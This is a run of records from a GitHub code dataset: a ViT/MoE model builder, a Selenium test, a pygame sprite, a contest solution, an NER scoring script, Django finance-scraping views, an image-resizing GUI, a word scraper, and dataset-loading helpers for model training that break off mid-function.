freeze_clf=cfg[\"freeze_clf\"],\n base_criterion=cfg[\"base_criterion\"],\n setting=cfg[\"setting\"],\n use_head_div=cfg[\"use_head_div\"],\n head_div=cfg[\"head_div\"],\n )\n scheduler_args = dict(\n scheduler=cfg[\"scheduler\"],\n T_0=cfg[\"T_0\"],\n T_mult=cfg[\"T_mult\"],\n eta_min=cfg[\"eta_min\"],\n T_max=cfg[\"T_max\"],\n )\n if cfg[\"model\"] == \"vit-s\":\n vit_model = ViTLightning(vit_args, clf_args, scheduler_args)\n if \"moe\" in cfg[\"model\"]:\n moe_args = dict(\n num_experts=cfg[\"nb_experts\"],\n k=cfg[\"k\"],\n noisy_gating=cfg[\"noisy_gating\"],\n dropout=cfg[\"dropout\"],\n hidden_act=cfg[\"hidden_act\"],\n input_size=cfg[\"dim\"],\n hidden_size=cfg[\"mlp_dim\"],\n upcycle_ratio=cfg[\"upcycle_ratio\"],\n upcycle_order=cfg[\"upcycle_order\"],\n routing=cfg[\"routing\"],\n capacity_factor=cfg[\"capacity_factor\"],\n trainable=cfg[\"trainable\"],\n )\n if cfg[\"model\"] == \"moe-vit-s\":\n vit_model = MoEViTLightning(\n vit_args,\n moe_args,\n clf_args,\n scheduler_args,\n load_factor=cfg[\"load_factor\"],\n distill_moe=cfg[\"distill_moe\"],\n )\n elif cfg[\"model\"] == \"moe-xcit-s\":\n vit_model = MoEXCiTLightning(\n vit_args,\n moe_args,\n clf_args,\n scheduler_args,\n distill_moe=cfg[\"distill_moe\"],\n )\n else:\n raise ValueError(\"model name not found\")\n else:\n raise ValueError(\"model name not found\")\n\n return vit_model\n","repo_name":"NizarIslah/continual-SMoE","sub_path":"src/models/vit.py","file_name":"vit.py","file_ext":"py","file_size_in_byte":18331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70940237681","text":"__author__ = 'cromox'\n\nfrom pages.p01google.p01searchgithubcromox1 import P01SearchGitHubCromox1\nfrom utilities.teststatus import TestStatus as tStatus\nimport unittest\nimport pytest\nimport utilities.custom_logger as cl\nimport logging\nimport sys\n\n@pytest.mark.usefixtures(\"oneTimeSetUp\", \"setUp\")\nclass P01SearchGitHubCromox1Tests(unittest.TestCase):\n log = cl.customLogger(logging.DEBUG)\n urlnow = None\n\n @pytest.fixture(autouse=True)\n def objectSetup(self):\n self.googlesearchpage = P01SearchGitHubCromox1(self.driver)\n self.tstatus = tStatus(self.driver)\n\n # @pytest.mark.run(order=1)\n @pytest.mark.tryfirst\n def test1_google_github_cromox1_page(self):\n self.log.info(\"=== >> \" + sys._getframe().f_code.co_name + \" started\")\n result = self.googlesearchpage.verifyPageURLlow(\"https://www.google.co.uk\")\n self.tstatus.mark(result, \"Currently At Google Page Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n result = self.googlesearchpage.verifyWordExistInURL('google')\n self.tstatus.mark(result, \"google word Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n self.googlesearchpage.gotoSearchArea()\n self.googlesearchpage.searchGitHubCromox1()\n self.googlesearchpage.gotoGitHubCromox1()\n result = self.googlesearchpage.verifyWordExistInURL('cromox1')\n self.tstatus.mark(result, \"GitHub cromox1 word Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n result = self.googlesearchpage.verifyPageURL(\"https://github.com/cromox1/\")\n self.__class__.urlnow = self.googlesearchpage.returnCurrentURL().rstrip('/')\n print(\"ResultLast = \" + str(result))\n self.tstatus.markFinal(\"URL GitHub cromox1 verified\", result, sys._getframe().f_code.co_name)\n\n # @pytest.mark.run(order=2)\n @pytest.mark.trylast\n def test2_github_cromox1_repo(self):\n self.log.info(\"=== >> \" + sys._getframe().f_code.co_name + \" started\")\n urlcurrent = self.__class__.urlnow\n print('CROMOX1_URL = ' + urlcurrent)\n result = self.googlesearchpage.verifyPageURL(\"https://github.com/cromox1/\")\n self.tstatus.mark(result, \"GitHub cromox1 URL Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n self.googlesearchpage.gotosite(urlcurrent + '?tab=repositories')\n print('CURRENT URL = ' + self.googlesearchpage.returnCurrentURL())\n result = self.googlesearchpage.verifyPageURL(\"https://github.com/cromox1?tab=repositories\")\n self.tstatus.mark(result, \"GitHub cromox1 Repositories URL Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n list_repo1 = self.googlesearchpage.getElementList('wb-break-all', locatorType='class')\n # print('LIST = ' + str(list_repo1))\n print('NUMBER OF REPO = ' + str(len(list_repo1)))\n result = self.googlesearchpage.verifyActualGreaterEqualExpected(len(list_repo1), 1)\n self.tstatus.mark(result, \"Repositories exist i.e. more than 0\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n i = 1\n for element in list_repo1:\n print(str(i) + ') ' + element.text)\n i = i + 1\n # self.assertEqual(i - 1, len(list_repo1))\n result = self.googlesearchpage.verifyActualEqualExpected(i - 1, len(list_repo1))\n self.tstatus.mark(result, \"Repositories number verified\")\n print(\"ResultLast = \" + str(result))\n self.tstatus.markFinal(\"GitHub cromox1 repositories verified\", result, sys._getframe().f_code.co_name)","repo_name":"cromox1/Selenium","sub_path":"MengKome/tests/p01google/p01searchgithubcromox1_test1.py","file_name":"p01searchgithubcromox1_test1.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5312192352","text":"import pygame\nfrom pygame.sprite import Sprite\nclass Bullet(Sprite):\n \"\"\"管理发射子弹\"\"\"\n def __init__(self,screen,rocket):\n \"\"\"在火箭所在位置创建子弹\"\"\"\n super().__init__()\n self.screen=screen\n #创建子弹\n self.rect=pygame.Rect(0,0,15,5)\n self.rect.centery=rocket.rect.centery\n self.rect.right=rocket.rect.right\n self.color=60,60,60\n self.speed_factor=1\n\n def update(self):\n \"\"\"向右移动子弹\"\"\"\n self.rect.x+=self.speed_factor\n\n def draw_bullet(self):\n \"\"\"在屏幕绘制子弹\"\"\"\n pygame.draw.rect(self.screen,self.color,self.rect)\n","repo_name":"scalpelHD/Study_python","sub_path":"习题/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4428320371","text":"# 백준 문제(2021.8.3)\n# 2476번) https://www.acmicpc.net/problem/2476\n\nn = int(input())\nmax_sum = 0\nsum = 0\n\nfor i in range(n) :\n a, b, c = map(int, input().split())\n\n if(a!=b!=c) :\n sum = max(a, b, c)*100\n elif(a==b==c) :\n sum = 10000 + a*1000\n elif(a==b) :\n sum = 1000 + a*100\n elif(b==c) :\n sum = 1000 + b*100\n elif(a==c) :\n sum = 1000 + c*100\n\n if(max_sum < sum) :\n max_sum = sum\n\nprint(max_sum)\n","repo_name":"hyom72/baekjoon_study","sub_path":"Bronze3/2476.py","file_name":"2476.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15596691881","text":"import sys, json, getopt\nfrom dateutil import parser\n\ndef overlap(offsetsa, offsetsb):\n try:\n start1, end1 = offsetsa.split('_')\n start2, end2 = offsetsb.split('_')\n except ValueError:\n print(offsetsa)\n print(offsetsb)\n return not (int(end1) < int(start2) or int(end2) < int(start1))\n\ndef exact(offsetsa, offsetsb):\n try:\n start1, end1 = offsetsa.split('_')\n start2, end2 = offsetsb.split('_')\n except ValueError:\n print(offsetsa)\n print(offsetsb)\n return (int(start1) == int(start2)) and (int(end1) == int(end2))\n\n# this to ensure we get rid of derived types when loading entities (redundant otherwise)\ndef removeDerivs(annots):\n return { (a,c) for a,c in annots if c.find('derivType') < 0 }\n\ndef compareTextsOverlap(eGold, eModel):\n eGold = removeDerivs(eGold)\n eModel = removeDerivs(eModel)\n tp, fp, fn = 0, 0, 0\n for (offsets_gold, cat_gold) in eGold:\n for (offsets_model, cat_model) in eModel:\n if overlap(offsets_gold, offsets_model) and cat_gold == cat_model:\n tp += 1\n break\n fp = len(eModel) - tp\n fn = len(eGold) - tp\n return [tp, fp, fn]\n\ndef compareTextsExact(eGold, eModel):\n eGold = removeDerivs(eGold)\n eModel = removeDerivs(eModel)\n tp, fp, fn = 0, 0, 0\n for (offsets_gold, cat_gold) in eGold:\n for (offsets_model, cat_model) in eModel:\n if exact(offsets_gold, offsets_model) and cat_gold == cat_model:\n tp += 1\n break\n fp = len(eModel) - tp\n fn = len(eGold) - tp\n return [tp, fp, fn]\n\ndef makeAnnsFormat(inputDoc, cols, htype):\n z_anns = []\n for ben in inputDoc.split('\\n'):\n pcs = ben.split('\\t')\n try:\n if len(pcs)==cols:\n cat, ofrom, oto = pcs[-2].split(' ')\n z_anns.append( [ofrom+\"_\"+oto, cat] )\n except ValueError:\n # handling fragmented entity, two strategies:\n if htype=='merge':\n # take start and end, use as a single big entity\n cat, ofrom, ignored, oto = pcs[-2].split(' ')\n z_anns.append( [ofrom+\"_\"+oto, cat] )\n if htype=='split':\n # split into two entities\n catAndOffsets1, offsets2 = pcs[-2].split(';')\n cat, ofrom, oto = catAndOffsets1.split(' ')\n z_anns.append( [ofrom+\"_\"+oto, cat] )\n ofrom, oto = offsets2.split(' ')\n z_anns.append( [ofrom+\"_\"+oto, cat] ) \n return z_anns\n\n# compute micro F1 scores for exact and overlap matches\n# htype parameter reflects two possible strategies for handling fragmented entities (\"split\" or \"merge\")\ndef computeScores(goldfile, userfile, htype=\"split\"):\n\n global_tp_ov = 0 ; global_fp_ov = 0 ; global_fn_ov = 0\n global_tp_ex = 0 ; global_fp_ex = 0 ; global_fn_ex = 0\n\n idsToAnnsUser = {}\n with open(userfile) as json_data:\n userjson = json.load(json_data)\n for nr in range(len(userjson)):\n # id = 'PCCwR-1.1-TXT/short/Inne teksty pisane/722.txt'\n if 'answers' in userjson[nr]:\n idsToAnnsUser[userjson[nr]['id']] = userjson[nr]['answers']\n else:\n idsToAnnsUser[userjson[nr]['id']] = ''\n\n found = 0;\n nonfound = 0\n\n idsToAnnsGold = {}\n with open(goldfile) as json_data:\n goldjson = json.load(json_data)\n\n for nr in range(len(goldjson['questions'])):\n idGold = '/'.join(goldjson['questions'][nr]['input']['fname'].split('/')[4:])\n # print(idGold)\n if idGold in idsToAnnsUser:\n found += 1\n # find the most recent answer:\n if len(goldjson['questions'][nr]['answers']) > 1:\n maximum = parser.parse('1900-01-02T14:22:41.439308+00:00');\n index = 0\n for i, value in enumerate(goldjson['questions'][nr]['answers']):\n value = parser.parse(goldjson['questions'][nr]['answers'][i]['created'])\n if value > maximum:\n maximum = value\n index = i\n idsToAnnsGold[idGold] = goldjson['questions'][nr]['answers'][index]['data']['brat']\n else:\n idsToAnnsGold[idGold] = goldjson['questions'][nr]['answers'][0]['data']['brat']\n\n # overlap scores:\n ovtp = compareTextsOverlap(makeAnnsFormat(idsToAnnsGold[idGold], 3, htype),\n makeAnnsFormat(idsToAnnsUser[idGold], 2, htype))\n global_tp_ov += ovtp[0]\n global_fp_ov += ovtp[1]\n global_fn_ov += ovtp[2]\n\n # exact match scores:\n extp = compareTextsExact(makeAnnsFormat(idsToAnnsGold[idGold], 3, htype),\n makeAnnsFormat(idsToAnnsUser[idGold], 2, htype))\n global_tp_ex += extp[0]\n global_fp_ex += extp[1]\n global_fn_ex += extp[2]\n\n # id not found\n else:\n nonfound += 1\n\n print(userfile)\n print(\"Nr of documents identified by ID in both data sets: \"+str(found)+\", not identified (left out): \"+str(nonfound))\n\n prec = float(global_tp_ov) / float(global_fp_ov + global_tp_ov)\n recall = float(global_tp_ov) / float(global_fn_ov + global_tp_ov)\n f1 = float(2 * prec * recall) / float(prec + recall)\n print(\"OVERLAP precision: %0.3f recall: %0.3f F1: %0.3f \" %( prec, recall, f1))\n\n prec = float(global_tp_ex) / float(global_fp_ex + global_tp_ex)\n recall = float(global_tp_ex) / float(global_fn_ex + global_tp_ex)\n f1 = float(2 * prec * recall) / float(prec + recall)\n print(\"EXACT precision: %0.3f recall: %0.3f F1: %0.3f \" %( prec, recall, f1))\n\n\n\n\n\ndef main(argv):\n\n goldfile = 'POLEVAL-NER_GOLD.json'\n userfile = ''\n try:\n opts, args = getopt.getopt(argv, \"g:u:h\", [\"goldfile=\", \"userfile=\"])\n except getopt.GetoptError:\n print('poleval_ner_test.py -g -u ')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-h':\n print('poleval_ner_test.py -g -u ')\n sys.exit()\n elif opt in (\"-u\", \"--userfile\"):\n userfile = arg\n elif opt in (\"-g\", \"--goldfile\"):\n goldfile = arg\n\n print('gold file is: ' + goldfile)\n print('user file is: '+ userfile)\n\n computeScores(goldfile, userfile, htype=\"split\")\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"ipipan/spacy-pl","sub_path":"evaluation/ner_evaluation/poleval_ner_test.py","file_name":"poleval_ner_test.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"75"} +{"seq_id":"41917868374","text":"from genericpath import exists\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport json\nfrom datetime import date, datetime\nfrom financial_app.models.enterprise import Dividend, Enterprise, Share\nfrom . import google_finance, yahoo_finance, investing_finance\n\n\ndef home(request):\n response = {\n 'id': 1,\n 'status': 'success'\n }\n return HttpResponse(json.dumps(response), content_type=\"application/json\")\n\n\ndef enterprise(request, ticker):\n finance = json.loads(yahoo_finance.ticker(request, ticker))\n data = finance[\"data\"]\n if not data:\n return HttpResponse(\"no data\")\n try:\n enterprise = Enterprise.objects.get(ticker=data[\"symbol\"])\n enterprise.name=data[\"longName\"]\n enterprise.description=data[\"longBusinessSummary\"]\n enterprise.sector=data[\"sector\"]\n enterprise.website=data[\"website\"]\n enterprise.logo_url=data[\"logo_url\"]\n enterprise.share_count=data[\"sharesOutstanding\"]\n enterprise.save()\n return HttpResponse(\"success udapte\")\n except Enterprise.DoesNotExist:\n enterprise = Enterprise(\n name=data[\"longName\"],\n ticker=data[\"symbol\"],\n description=data[\"longBusinessSummary\"],\n sector=data[\"sector\"],\n website=data[\"website\"],\n logo_url=data[\"logo_url\"],\n share_count=data[\"sharesOutstanding\"],\n )\n enterprise.save()\n return HttpResponse(\"success create\")\n\n\ndef dividends(request, ticker):\n finance = json.loads(yahoo_finance.dividends(request, ticker))\n data = finance[\"data\"]\n if not data:\n return HttpResponse(\"no data\")\n try:\n enterprise = Enterprise.objects.get(ticker=ticker)\n for dividend in data:\n timestamp = dividend[\"Date\"]\n try:\n d = Dividend.objects.get(\n enterprise=enterprise,\n date=datetime.utcfromtimestamp(timestamp/1000)\n )\n d.price = dividend[\"Dividends\"]\n d.save()\n except Dividend.DoesNotExist:\n d = Dividend(\n enterprise=enterprise,\n date=datetime.utcfromtimestamp(timestamp/1000),\n price=dividend[\"Dividends\"]\n )\n d.save()\n return HttpResponse(\"success create\")\n except Enterprise.DoesNotExist:\n return HttpResponse(\"no enterprise\")\n\n \ndef shares(request, ticker):\n current_date = date.today().strftime(\"%Y-%m-%d\")\n finance = json.loads(yahoo_finance.prices(request, ticker, \"2022-01-01\", current_date))\n data = finance[\"data\"]\n if not data:\n return HttpResponse(\"no data\")\n try:\n enterprise = Enterprise.objects.get(ticker=ticker)\n for share in data:\n timestamp = share[\"Date\"]\n try:\n s = Share.objects.get(\n enterprise=enterprise,\n date=datetime.utcfromtimestamp(timestamp/1000)\n )\n s.price = share[\"Close\"]\n s.volume = share[\"Volume\"]\n s.save()\n except Share.DoesNotExist:\n s = Share(\n enterprise=enterprise,\n date=datetime.utcfromtimestamp(timestamp/1000),\n price=share[\"Close\"],\n volume=share[\"Volume\"],\n )\n s.save()\n return HttpResponse(\"success create\")\n except Enterprise.DoesNotExist:\n return HttpResponse(\"no enterprise\")","repo_name":"ChannVincent/django_demo_3","sub_path":"financial_app/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29159946194","text":"from os import listdir\nfrom os.path import isfile, join\nimport os\nimport PySimpleGUI as sg\nfrom PIL import Image\n\n\ndef convertJPG(fnames):\n new_fnames = []\n for file_name in fnames:\n if file_name.lower().endswith(\".jpg\"):\n im1 = Image.open(file_name)\n new_file_name = file_name[:-3] + \"png\"\n im1.save(new_file_name)\n os.remove(file_name)\n new_fnames.append(new_file_name)\n else:\n new_fnames.append(file_name)\n return new_fnames\n\n\ndef resize(file_list, folder):\n for file in file_list:\n path = os.path.join(folder, file)\n if os.path.isfile(path) and file.lower().endswith((\".png\", \".jpg\")):\n img = Image.open(path)\n img = img.resize((200, 250), Image.ANTIALIAS)\n\n resized_folder = folder + \"/resized/\"\n os.makedirs(resized_folder, exist_ok=True)\n\n img.save(resized_folder + file)\n\n onlyfiles = [f for f in listdir(folder) if isfile(join(folder, f))]\n for element in onlyfiles:\n if element.startswith(\"resized\"):\n os.remove(join(folder, element))\n\nfile_list_column = [\n [\n sg.Text(\"Image Folder\"),\n sg.In(size=(25, 1), enable_events=True, key=\"-FOLDER-\"),\n sg.FolderBrowse(),\n ],\n [\n sg.Listbox(\n values=[], enable_events=True, size=(40, 20),\n key=\"-FILE LIST-\"\n )\n ],\n]\n\nimage_viewer_column = [\n [sg.Text(\"Chose an image from the list on the left\")],\n [sg.Text(size=(40, 1), key=\"-TOUT-\")],\n [sg.Image(key=\"-IMAGE-\")],\n [sg.Button(button_text=\"Select\", key=\"-SELECT-\")],\n [sg.Button(button_text=\"Finish\", key=\"-FINISH-\")],\n]\n\nlayout = [\n [\n sg.Column(file_list_column),\n sg.VSeparator(),\n sg.Column(image_viewer_column),\n ]\n]\n\nwindow = sg.Window(\"Image Viewer\", layout)\n\nresized_folder = \"\"\n\nchosen_image = \"\"\nchosen_images = []\nresult = {}\n\nwhile True:\n event, values = window.read()\n if event == \"Exit\" or event == sg.WIN_CLOSED:\n break\n if event == \"-FOLDER-\":\n folder = values[\"-FOLDER-\"]\n try:\n file_list = os.listdir(folder)\n except:\n file_list = []\n\n fnames = [\n file\n for file in file_list\n if os.path.isfile(os.path.join(folder, file)) and file.lower().endswith((\".png\", \".jpg\"))\n ]\n new_fnames = convertJPG(fnames)\n\n window[\"-FILE LIST-\"].update(new_fnames)\n\n resize(file_list, folder)\n\n elif event == \"-FILE LIST-\":\n try:\n filepath = os.path.join(\n values[\"-FOLDER-\"], values[\"-FILE LIST-\"][0]\n )\n filepath_for_image = os.path.join(\n values[\"-FOLDER-\"] + \"/resized/\", values[\"-FILE LIST-\"][0]\n )\n window[\"-TOUT-\"].update(filepath)\n window[\"-IMAGE-\"].update(filename=filepath_for_image)\n except:\n print(\"error updating file list\")\n pass\n elif event == \"-SELECT-\":\n try:\n chosen_image = os.path.join(\n values[\"-FOLDER-\"], values[\"-FILE LIST-\"][0]\n )\n chosen_images.append(chosen_image)\n print(\"images chosen so far: \", chosen_images)\n except:\n print(\"error selecting image\")\n pass\n elif event == \"-FINISH-\":\n break\n\nprint(\"images chosen so are: \", chosen_images)\nset_of_chosen_images = set(image for image in chosen_images)\nprint(len(set_of_chosen_images))\nwindow.close()\n","repo_name":"irnoz/ProjectForBachelorsDegree-SAMOSI-","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19705790624","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = \"https://www.wordcheats.com/wordlist/words-with-friends/2-letter-words\"\nreq = requests.get(url)\nsoup = BeautifulSoup(req.content, 'html.parser')\ntag = soup.find('ul', {'id': 'word-list'})\n\nchildren = tag.findChildren(\"li\" , recursive=False)\nwords = '\\n'.join([child.contents[0] for child in children])\nfile = open('scrape.out', 'w+')\nfile.write(words)\n","repo_name":"danelynnn/word_blitz_bot","sub_path":"bs.py","file_name":"bs.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11223521301","text":"\"\"\" helper function\nauthor baiyu\n\"\"\"\nimport os\nimport sys\nimport re\nimport time\nimport numpy as np\nfrom conf import settings\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import _LRScheduler\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport pickle\nfrom PIL import Image\n\nfrom sklearn.metrics import accuracy_score, classification_report\n\n\n\n\n###########################\n####### BEGIN SELF ########\n###########################\ndef leave_topk(output, k=5, fillzero=False):\n '''\n output of shape batch_size * num_classes\n '''\n num_classes = output.shape[1]\n values, index = output.topk(dim=1, k=k, largest=True, sorted=True)\n onehot_index = F.one_hot(index, num_classes=num_classes).sum(dim=1).bool()\n index = torch.sort(index, dim=1)[0]\n values = torch.gather(output, dim=1, index=index)\n if fillzero:\n output1 = torch.zeros_like(output)\n else:\n fill_values = (1-values.sum(dim=1))/(num_classes - k)\n output1 = fill_values.reshape(-1, 1).expand(output.shape[0], output.shape[1]).clone()\n output1[onehot_index] = values.reshape(-1)\n return output1\n\ndef shannon_entropy(X):\n '''\n X of shape: n*m.\n '''\n return - torch.sum(torch.log(X)*X, dim=1)\n\ndef fast_load_model(name, folder, num_classes, device, model_file='model.pth', norm_mean=(0, 0, 0), norm_std=(1, 1, 1), return_path=False):\n '''\n auxillary function for fast model loading, and combine the model with training standarization mean and std.\n '''\n path = \"./checkpoint/{}/{}/\".format(name, folder)\n net = get_network(name, False, num_classes=num_classes).to(device) \n net.load_state_dict(torch.load(path + model_file, map_location=device))\n net.eval()\n net = nn.Sequential(transforms.Normalize(norm_mean, norm_std), net)\n if return_path:\n return net, path\n return net\n\n\ndef evaluate_net(net, test_loader, device):\n '''\n similar to the next one.\n '''\n net.eval()\n correct_1 = 0.0\n correct_5 = 0.0\n\n with torch.no_grad():\n for n_iter, (image, label) in enumerate(test_loader):\n # print(\"iteration: {}\\ttotal {} iterations\".format(n_iter + 1, len(test_loader)))\n image = image.to(device)\n label = label.to(device)\n output = net(image)\n _, pred = output.topk(5, 1, largest=True, sorted=True)\n\n label = label.view(label.size(0), -1).expand_as(pred)\n correct = pred.eq(label).float()\n #compute top 5\n correct_5 += correct[:, :5].sum()\n #compute top1\n correct_1 += correct[:, :1].sum()\n\n # print()\n # print(\"Top 1 err: \", 1 - correct_1 / len(test_loader.dataset))\n # print(\"Top 5 err: \", 1 - correct_5 / len(test_loader.dataset))\n # print(\"Parameter numbers: {}\".format(sum(p.numel() for p in net.parameters())))\n return correct_1.item(), correct_5.item()\n\n# model evaluation\ndef compute_accuracy(net, testloader, device):\n '''\n as the name.\n '''\n net.eval()\n pred = []\n true = []\n with torch.no_grad():\n for images, labels in testloader:\n images, labels = images.to(device), labels.to(device)\n pred += net(images).argmax(dim=1).tolist()\n true += labels.tolist()\n return accuracy_score(true, pred), pred, true\n\n### train functions\n#train the model\ndef train_mlp(net, trainloader, testloader, n_epochs, optimizer, criterion, device):\n '''\n used for train meta MLP.\n '''\n for epoch in range(1, n_epochs+1):\n net.train()\n running_loss = 0.\n train_pred = []\n train_true = []\n for i, (inputs, labels) in enumerate(trainloader, 1):\n train_true += labels.tolist()\n inputs, labels = inputs.to(device), labels.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n running_loss += loss.item() * len(labels)\n train_pred += outputs.argmax(dim=1).tolist()\n\n # Print accuracy after every epoch\n accuracy, pred, true = compute_accuracy(net, testloader, device)\n print('Epoch {}. Train loss: {:.2f}. Train acc: {:.2f}. Test acc: {:.2f}.'.format(\n epoch, \n running_loss / len(trainloader.dataset),\n 100 * accuracy_score(train_true, train_pred),\n 100 * accuracy ))\n\n print('Finished Training')\n return accuracy\n\n###########################\n######## END SELF #########\n###########################\n\n\n###########################\n####### BEGIN NEW #########\n###########################\n\nclass SubTrainDataset(Dataset):\n def __init__(self, data, targets, transform=None, target_transform=None):\n self.data = data\n self.targets = targets\n self.transform = transform\n self.target_transform = target_transform\n def __getitem__(self, index):\n img, target = self.data[index], self.targets[index]\n\n # doing this so that it is consistent with all other datasets\n # to return a PIL Image\n # TODO: unify the following line, in case study, the below line does not exist.\n # img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return img, target\n def __len__(self):\n return len(self.data)\n\n# methods for loading sub-datasets of CIFAR-10/100 and Tiny-ImageNet\n\n\ndef get_dataset_hyperparam(dataset):\n if dataset == 'cifar10':\n return settings.CIFAR10_EPOCH, settings.CIFAR10_MILESTONES\n if dataset == 'cifar100':\n return settings.CIFAR100_EPOCH, settings.CIFAR100_MILESTONES\n if dataset == 'tinyimagenet':\n return settings.TINYIMAGENET_EPOCH, settings.TINYIMAGENET_MILESTONES\n\ndef get_dataset_mean_std(dataset):\n if dataset == 'cifar10':\n return settings.CIFAR10_TRAIN_MEAN, settings.CIFAR10_TRAIN_STD\n if dataset == 'cifar100':\n return settings.CIFAR100_TRAIN_MEAN, settings.CIFAR100_TRAIN_STD\n if dataset == 'tinyimagenet':\n return settings.TINYIMAGENET_TRAIN_MEAN, settings.TINYIMAGENET_TRAIN_STD\n \ndef get_intersection_mean_std_dict(dataset_name):\n '''\n get normalization mean and std for each intersections 0.0, 0.1, ..., 0.9, 1.0. used for evaluation.\n '''\n mean_std_dict = {}\n for s in (np.arange(11) / 10):\n Set1, Set2 = pickle.load(open(os.path.join(settings.DATA_PATH, f'similarity/{dataset_name.upper()}_intersect_{s}.pkl'), 'rb'))\n mean = tuple((Set2[0] / 255).mean(axis=(0, 1, 2)))\n std = tuple((Set2[0] / 255).std(axis=(0, 1, 2)))\n mean_std_dict['int{}'.format(s)] = (mean, std)\n mean_std_dict['vic'] = mean_std_dict['int1.0']\n return mean_std_dict\n\ndef get_subtraining_dataloader_cifar10_intersect(propor=0.5, batch_size=16, num_workers=8, shuffle=True, sub_idx=1):\n\n \n X_set, y_set = pickle.load(open(os.path.join(settings.DATA_PATH, f'similarity/CIFAR10_intersect_{propor}.pkl'), 'rb'))[sub_idx]\n mean = tuple((X_set / 255).mean(axis=(0, 1, 2)))\n std = tuple((X_set / 255).std(axis=(0, 1, 2)))\n \n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar10_training = SubTrainDataset(X_set, list(y_set), transform=transform_train)\n cifar10_training_loader = DataLoader(\n cifar10_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return cifar10_training_loader, mean, std\n\ndef get_subtraining_dataloader_cifar100_intersect(propor=0.5, batch_size=16, num_workers=8, shuffle=True, sub_idx=1):\n\n \n X_set, y_set = pickle.load(open(os.path.join(settings.DATA_PATH, f'similarity/CIFAR100_intersect_{propor}.pkl'), 'rb'))[sub_idx]\n mean = tuple((X_set / 255).mean(axis=(0, 1, 2)))\n std = tuple((X_set / 255).std(axis=(0, 1, 2)))\n \n \n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar100_training = SubTrainDataset(X_set, list(y_set), transform=transform_train)\n cifar100_training_loader = DataLoader(\n cifar100_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return cifar100_training_loader, mean, std\n\ndef get_subtraining_dataloader_tinyimagenet_intersect(propor=0.5, batch_size=16, num_workers=8, shuffle=True, sub_idx=1):\n\n X_set, y_set = pickle.load(open(os.path.join(settings.DATA_PATH, 'similarity/TINYIMAGENET_intersect_{propor}.pkl'), 'rb'))[sub_idx]\n mean = tuple((X_set / 255).mean(axis=(0, 1, 2)))\n std = tuple((X_set / 255).std(axis=(0, 1, 2)))\n \n \n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(64, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n tinyimagenet_training = SubTrainDataset(X_set, list(y_set), transform=transform_train)\n tinyimagenet_training_loader = DataLoader(\n tinyimagenet_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return tinyimagenet_training_loader, mean, std\n\ndef get_intersect_dataloader(dataset, propor, batch_size=16, num_workers=8, shuffle=True, sub_idx=1):\n if dataset == 'cifar10':\n return get_subtraining_dataloader_cifar10_intersect(propor=propor, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, sub_idx=sub_idx)\n elif dataset == 'cifar100':\n return get_subtraining_dataloader_cifar100_intersect(propor=propor, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, sub_idx=sub_idx)\n elif dataset == 'tinyimagenet':\n return get_subtraining_dataloader_tinyimagenet_intersect(propor=propor, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, sub_idx=sub_idx)\n\n\n\n\ndef get_training_dataloader_cifar10(mean, std, batch_size=16, num_workers=8, shuffle=True):\n\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n 